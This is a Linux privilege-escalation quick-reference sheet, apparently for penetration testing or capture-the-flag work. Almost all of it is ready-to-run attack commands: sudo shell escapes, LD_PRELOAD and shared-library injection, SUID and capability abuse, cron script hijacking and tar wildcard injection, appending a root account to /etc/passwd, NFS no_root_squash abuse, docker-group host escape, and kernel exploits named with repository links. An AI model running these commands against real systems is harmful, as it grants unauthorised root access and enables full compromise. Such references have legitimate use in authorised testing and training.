LINUX PRIVILEGE ESCALATION - QUICK REF
Each section: find it → exploit it. Replace <...> with your own values.

── AUTOMATED TOOLS (run first) ──────────────────────────────────────────────────────────────────
./linpeas.sh | tee out.txt                                           comprehensive scan (run first)
./lse.sh -l 1                                                        interesting finds only
./pspy64                                                             watch live processes (no root)

── SUDO -L ──────────────────────────────────────────────────────────────────────────────────────
sudo -l                                                              → check every binary at gtfobins.github.io
sudo vim -c ':!/bin/bash'                                            vim escape
sudo find . -exec /bin/bash \; -quit                                 find escape
sudo python3 -c 'import os; os.system("/bin/bash")'                  python escape
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo awk 'BEGIN {system("/bin/bash")}'
sudo perl -e 'exec "/bin/bash"'

[LD_PRELOAD — if env_keep+=LD_PRELOAD in sudo -l]
gcc -fPIC -shared -o /tmp/evil.so evil.c -nostartfiles               compile malicious .so
sudo LD_PRELOAD=/tmp/evil.so <any-allowed-binary>                    inject → root shell

── SUID / SGID ──────────────────────────────────────────────────────────────────────────────────
find / -perm -4000 -type f 2>/dev/null                               SUID binaries
find / -perm -2000 -type f 2>/dev/null                               SGID binaries
→ check every result at gtfobins.github.io (filter: SUID)
/bin/bash -p                                                         if bash is SUID
find . -exec /bin/bash -p \; -quit                                   find SUID escape
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'             python SUID escape

── CAPABILITIES ─────────────────────────────────────────────────────────────────────────────────
getcap -r / 2>/dev/null                                              dangerous: cap_setuid, cap_dac_read_search
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'        cap_setuid+ep → root
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash"'  cap_setuid+ep → root (perl)

── CRON JOBS ────────────────────────────────────────────────────────────────────────────────────
crontab -l && cat /etc/crontab && ls /etc/cron.*                     find cron jobs
pspy64                                                               watch live (catches unlisted jobs)
echo 'chmod +s /bin/bash' >> /path/to/writable-script.sh            script hijack → bash -p
touch -- '--checkpoint=1'                                            wildcard injection (in tar cron dir)
touch -- '--checkpoint-action=exec=bash /tmp/rev.sh'

── WRITABLE /etc/passwd ─────────────────────────────────────────────────────────────────────────
ls -la /etc/passwd                                                   writable = instant root
openssl passwd -1 <password>                                         generate hash
echo 'root2:<hash>:0:0:root:/root:/bin/bash' >> /etc/passwd          append new root user
su root2

── NFS no_root_squash ───────────────────────────────────────────────────────────────────────────
cat /etc/exports                                                     look for no_root_squash
showmount -e <target-ip>                                             from attacker
mount -t nfs <target-ip>:/<share> /mnt/nfs -o nolock                mount on attacker (as root)
cp /bin/bash /mnt/nfs/bash && chmod +s /mnt/nfs/bash                copy + set SUID
/tmp/bash -p                                                         run on target → root

── DOCKER GROUP ─────────────────────────────────────────────────────────────────────────────────
id | grep docker                                                     in docker group = root
docker run -v /:/mnt --rm -it alpine chroot /mnt sh                 mount host → chroot

── SYSTEMD / .so HIJACKING ──────────────────────────────────────────────────────────────────────
find /etc/systemd /lib/systemd -writable -type f 2>/dev/null        writable service files
ldd /usr/bin/<suid-binary>                                           list shared lib paths
find / -writable -name "*.so*" 2>/dev/null                          writable .so files
gcc -shared -fPIC -o /path/to/lib.so evil.c                         replace lib → root on SUID run

── KERNEL EXPLOITS (last resort) ────────────────────────────────────────────────────────────────
uname -a                                                             kernel version
searchsploit "linux kernel" <version>
DirtyPipe  CVE-2022-0847  Linux 5.8–5.16   github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
DirtyCow   CVE-2016-5195  Linux < 4.14     github.com/dirtycow
PwnKit     CVE-2021-4034  pkexec SUID      github.com/ly4k/PwnKit

Key:  sudo -l first → SUID/caps → cron (pspy64) → /etc/passwd / NFS → GTFOBins for everything
